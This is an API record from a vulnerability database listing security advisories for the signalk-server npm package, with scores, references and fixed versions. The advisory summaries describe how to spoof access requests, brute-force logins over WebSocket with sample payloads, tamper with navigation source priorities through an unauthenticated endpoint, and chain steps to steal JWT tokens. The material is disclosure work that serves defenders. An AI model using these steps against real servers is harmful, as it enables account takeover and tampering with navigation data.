Look up vulnerable packages by Package URL.

GET /api/packages/922319?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/packages/922319?format=api",
    "purl": "pkg:npm/signalk-server@2.13.4",
    "type": "npm",
    "namespace": "",
    "name": "signalk-server",
    "version": "2.13.4",
    "qualifiers": {},
    "subpath": "",
    "is_vulnerable": true,
    "next_non_vulnerable_version": "2.25.0",
    "latest_non_vulnerable_version": "2.25.0",
    "affected_by_vulnerabilities": [
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49555?format=api",
            "vulnerability_id": "VCID-1rr4-c6e1-nya1",
            "summary": "Signal K Server Vulnerable to Access Request Spoofing\nThe SignalK access request system has two related features that when combined by themselves and with the information disclosure vulnerability enable convincing social engineering attacks against administrators.\n\nWhen a device creates an access request, it specifies three fields: `clientId`, `description`, and `permissions`. The SignalK admin UI displays the `description` field prominently to the administrator when showing pending requests, but the actual `permissions` field (which determines the access level granted) is less visible or displayed separately. This allows an attacker to request `admin` permissions while providing a description that suggests readonly access.\n\nThe access request handler trusts the `X-Forwarded-For` HTTP header without validation to determine the client's IP address. This header is intended to preserve the original client IP when requests pass through reverse proxies, but when trusted unconditionally, it allows attackers to spoof their IP address. The spoofed IP is displayed to administrators in the access request approval interface, potentially making malicious requests appear to originate from trusted internal network addresses.\n\nSince device/source names can be enumerated via the information disclosure vulnerability, an attacker can impersonate a legitimate device or source, craft a convincing description, spoof a trusted internal IP address, and request elevated permissions, creating a highly convincing social engineering scenario that increases the likelihood of administrator approval.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69203",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00021",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05869",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00021",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05913",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00021",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05911",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00021",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05921",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69203"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/commit/221aff6cd89c56308084d1781b3abbf938605bd3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/commit/221aff6cd89c56308084d1781b3abbf938605bd3"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-02T19:02:06Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69203",
                    "reference_id": "CVE-2025-69203",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69203"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vfrf-vcj7-wvr8",
                    "reference_id": "GHSA-vfrf-vcj7-wvr8",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-vfrf-vcj7-wvr8"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vfrf-vcj7-wvr8",
                    "reference_id": "GHSA-vfrf-vcj7-wvr8",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-02T19:02:06Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vfrf-vcj7-wvr8"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/73159?format=api",
                    "purl": "pkg:npm/signalk-server@2.19.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2e2f-qt4n-dqa7"
                        },
                        {
                            "vulnerability": "VCID-3s8j-v31f-pyaf"
                        },
                        {
                            "vulnerability": "VCID-jq2a-wxb1-dufm"
                        },
                        {
                            "vulnerability": "VCID-ndfm-uuf3-nbfg"
                        },
                        {
                            "vulnerability": "VCID-v11p-jkzw-vkar"
                        },
                        {
                            "vulnerability": "VCID-xvyj-f4ps-kycx"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.19.0"
                }
            ],
            "aliases": [
                "CVE-2025-69203",
                "GHSA-vfrf-vcj7-wvr8"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1rr4-c6e1-nya1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93469?format=api",
            "vulnerability_id": "VCID-2e2f-qt4n-dqa7",
            "summary": "Signal K Server's WebSocket Login Endpoint Lacks Rate Limiting (Credential Brute-Force)\n## Summary\n\nThe HTTP login endpoints (`POST /login` and `POST /signalk/v1/auth/login`) are protected by `express-rate-limit` (default: 100 attempts per 10-minute window, configurable via `HTTP_RATE_LIMITS`). The WebSocket login path — sending `{login: {username, password}}` messages over an established WebSocket connection — calls `app.securityStrategy.login()` directly without any rate limiting.\n\nAn attacker can bypass HTTP rate limiting entirely by opening a WebSocket connection and attempting unlimited password guesses at the speed bcrypt allows (~20 attempts/sec with 10 salt rounds).\n\n## Details\n\n**Vulnerable code:** `src/interfaces/ws.ts`, function `processLoginRequest` (lines 753-780)\n\nThe function directly calls `app.securityStrategy.login(msg.login.username, msg.login.password)` with no throttling or attempt tracking.\n\n**Rate-limited HTTP path for comparison:** `src/tokensecurity.ts` lines 609-617 apply `loginLimiter` middleware to the HTTP login routes at line 637.\n\n## Steps to Reproduce\n\n1. Start Signal K server with security enabled\n2. Open a WebSocket connection to `ws://server:3000/signalk/v1/stream?subscribe=none`\n3. Wait for the hello message\n4. Send login attempts in rapid succession:\n   ```json\n   {\"requestId\": \"1\", \"login\": {\"username\": \"admin\", \"password\": \"guess1\"}}\n   {\"requestId\": \"2\", \"login\": {\"username\": \"admin\", \"password\": \"guess2\"}}\n   ```\n5. Observe that all attempts are processed without any 429 response or throttling\n6. For comparison, send 100+ HTTP POST requests to `/signalk/v1/auth/login` — the 101st returns 429\n\nA POC script is available that demonstrates both the HTTP rate limiting working correctly and the WebSocket path accepting unlimited attempts.\n\n## Impact\n\n- Credential brute-forcing via the WebSocket protocol at ~20 attempts/sec (bcrypt-limited)\n- Complete bypass of the HTTP rate limiting defense\n- A single WebSocket connection is sufficient for unlimited attempts\n- With multiple parallel connections, throughput multiplies\n- A 10,000-word dictionary attack completes in ~8 minutes over a single connection\n\nSignal K servers are commonly deployed on boat networks where they may be accessible to other devices on the same LAN.\n\n## CWE\n\nCWE-307: Improper Restriction of Excessive Authentication Attempts\n\n## Suggested Fix\n\nTrack failed login attempts per remote IP in a shared store (or reuse the existing express-rate-limit store) that is checked in both the HTTP login middleware and the processLoginRequest WebSocket handler.\n\n## Context\n\nFound while building an open source maritime security scanner. Verified on v2.24.0 (current master).\n\nDiscovered by Mark Curphey",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41893",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1118",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11173",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11057",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11138",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41893"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/commit/215d81eb700d5419c3396a0fbf23f2e246dfac2d",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-14T17:50:07Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/commit/215d81eb700d5419c3396a0fbf23f2e246dfac2d"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/pull/2568",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-14T17:50:07Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/pull/2568"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.25.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-14T17:50:07Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.25.0"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vmfm-ch9h-5c7g",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-14T17:50:07Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vmfm-ch9h-5c7g"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41893",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41893"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vmfm-ch9h-5c7g",
                    "reference_id": "GHSA-vmfm-ch9h-5c7g",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-vmfm-ch9h-5c7g"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/111518?format=api",
                    "purl": "pkg:npm/signalk-server@2.25.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.25.0"
                }
            ],
            "aliases": [
                "CVE-2026-41893",
                "GHSA-vmfm-ch9h-5c7g"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2e2f-qt4n-dqa7"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89499?format=api",
            "vulnerability_id": "VCID-3s8j-v31f-pyaf",
            "summary": "Signal K Server: Unauthenticated Source Priorities Manipulation\n## Summary\n\nThe SignalK Server exposes an unauthenticated HTTP endpoint that allows remote attackers to modify navigation data source priorities. This endpoint, accessible via `PUT /signalk/v1/api/sourcePriorities`, does not enforce authentication or authorization checks and directly assigns user-controlled input to the server configuration.\n\nAs a result, attackers can influence which GPS, AIS, or other sensor data sources are trusted by the system. The changes are immediately applied and persisted to disk, allowing the manipulation to survive server restarts.\n\n### Affected Component\n- **File**: `src/serverroutes.ts`\n- **Endpoint**: `PUT /signalk/v1/api/sourcePriorities` (also accessible at `/skServer/sourcePriorities`)\n- **Lines**: 1064-1076\n- **Function**: Source priorities configuration handler\n\n### Vulnerable Code\n\n```typescript\n// src/serverroutes.ts - Lines 1064-1076\napp.put(\n  `${SERVERROUTESPREFIX}/sourcePriorities`,\n  (req: Request, res: Response) => {\n    app.config.settings.sourcePriorities = req.body\n    app.activateSourcePriorities()\n    writeSettingsFile(app, app.config.settings, (err: any) => {\n      if (err) {\n        res\n          .status(500)\n          .send('Unable to save to sourcePrefences in settings file')\n      } else {\n        res.json({ result: 'ok' })\n      }\n    })\n  }\n)\n```\n## Vulnerability Characteristics\n\n**Missing Authentication**: The endpoint has zero authentication middleware, allowing unauthenticated access from any network-adjacent attacker.\n\n**Direct Configuration Assignment**: User-supplied request body is directly assigned to app.config.settings.sourcePriorities without validation or sanitization.\n\n**Persistent Storage**: Malicious configuration is written to disk via writeSettingsFile(), ensuring changes survive server restarts.\n**Live Configuration Update**: Changes take effect immediately via activateSourcePriorities(), affecting live navigation data processing.\n\n**No Input Validation**: No JSON schema validation, type checking, or field allowlisting is performed on the request body.\n\n## Impact\n- **Navigation Data Manipulation**: Attackers can modify source priorities to change which existing, active source's data is being used",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33951",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00102",
                            "scoring_system": "epss",
                            "scoring_elements": "0.27451",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00102",
                            "scoring_system": "epss",
                            "scoring_elements": "0.275",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00102",
                            "scoring_system": "epss",
                            "scoring_elements": "0.27538",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00102",
                            "scoring_system": "epss",
                            "scoring_elements": "0.27589",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33951"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0-beta.1",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0-beta.1"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-gfmv-vh34-h2x5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-gfmv-vh34-h2x5"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33951",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33951"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-gfmv-vh34-h2x5",
                    "reference_id": "GHSA-gfmv-vh34-h2x5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-gfmv-vh34-h2x5"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110693?format=api",
                    "purl": "pkg:npm/signalk-server@2.24.0-beta.1",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.24.0-beta.1"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1011716?format=api",
                    "purl": "pkg:npm/signalk-server@2.24.0-beta.3",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2e2f-qt4n-dqa7"
                        },
                        {
                            "vulnerability": "VCID-jq2a-wxb1-dufm"
                        },
                        {
                            "vulnerability": "VCID-ndfm-uuf3-nbfg"
                        },
                        {
                            "vulnerability": "VCID-veqf-x77b-4bf7"
                        },
                        {
                            "vulnerability": "VCID-xvyj-f4ps-kycx"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.24.0-beta.3"
                }
            ],
            "aliases": [
                "CVE-2026-33951",
                "GHSA-gfmv-vh34-h2x5"
            ],
            "risk_score": 3.4,
            "exploitability": "0.5",
            "weighted_severity": "6.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3s8j-v31f-pyaf"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49556?format=api",
            "vulnerability_id": "VCID-84tp-z2dz-u7at",
            "summary": "Signal K Server vulnerable to JWT Token Theft via WebSocket Enumeration and Unauthenticated Polling\nSignalK Server exposes two features that can be chained together to steal JWT authentication tokens without any prior authentication. The attack combines WebSocket-based request enumeration with unauthenticated polling of access request status.\n\n**Unauthenticated WebSocket Request Enumeration**: When a WebSocket client connects to the SignalK stream endpoint with the `serverevents=all` query parameter, the server sends all cached server events including `ACCESS_REQUEST` events that contain details about pending access requests. The `startServerEvents` function iterates over `app.lastServerEvents` and writes each cached event to any connected client without verifying authorization level. Since WebSocket connections are allowed for readonly users (which includes unauthenticated users when `allow_readonly` is true), attackers receive these events containing request IDs, client identifiers, descriptions, requested permissions, and IP addresses.\n\n**Unauthenticated Token Polling**: The access request status endpoint at `/signalk/v1/access/requests/:id` returns the full state of an access request without requiring authentication. When an administrator approves a request, the response includes the issued JWT token in plaintext. The `queryRequest` function returns the complete request object including the token field, and the REST endpoint uses readonly authentication, allowing unauthenticated access.\n\nAn attacker has two paths to exploit these vulnerabilities:\n\n1. The attacker creates their own access request (using the IP spoofing vulnerability to craft a convincing spoofed request), then polls their own request ID until an administrator approves it, receiving the JWT token.\n\n2. 
The attacker passively monitors the WebSocket stream to discover request IDs from legitimate devices, then polls those IDs and steals the JWT tokens when administrators approve them, hijacking legitimate device credentials.\n\nBoth paths require zero authentication and enable complete authentication bypass.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68620",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17657",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17732",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17766",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17771",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68620"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/commit/221aff6cd89c56308084d1781b3abbf938605bd3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/commit/221aff6cd89c56308084d1781b3abbf938605bd3"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-01-02T18:58:09Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68620",
                    "reference_id": "CVE-2025-68620",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68620"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-fq56-hvg6-wvm5",
                    "reference_id": "GHSA-fq56-hvg6-wvm5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-fq56-hvg6-wvm5"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-fq56-hvg6-wvm5",
                    "reference_id": "GHSA-fq56-hvg6-wvm5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-01-02T18:58:09Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-fq56-hvg6-wvm5"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/73159?format=api",
                    "purl": "pkg:npm/signalk-server@2.19.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2e2f-qt4n-dqa7"
                        },
                        {
                            "vulnerability": "VCID-3s8j-v31f-pyaf"
                        },
                        {
                            "vulnerability": "VCID-jq2a-wxb1-dufm"
                        },
                        {
                            "vulnerability": "VCID-ndfm-uuf3-nbfg"
                        },
                        {
                            "vulnerability": "VCID-v11p-jkzw-vkar"
                        },
                        {
